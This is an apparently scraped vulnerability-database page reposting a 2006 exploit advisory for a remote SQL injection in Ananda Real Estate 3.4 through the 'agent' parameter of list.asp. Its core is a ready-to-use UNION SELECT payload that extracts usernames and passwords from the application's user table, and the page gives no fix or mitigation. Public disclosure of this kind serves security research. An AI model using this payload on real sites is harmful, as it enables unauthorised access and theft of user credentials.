Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15489
HistoryDec 25, 2006 - 12:00 a.m.

Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability

2006-12-2500:00:00
vulners.com
24

Title : Ananda Real Estate <= 3.4 (agent) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : http://www.enthrallweb.us

$$ : 179.40 USD


[[SQL]]]---------------------------------------------------------

http://[target]/[path]//list.asp?agent=[SQL]

Example:

//list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user%20where%20id%20like%201

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

Im not Hacker!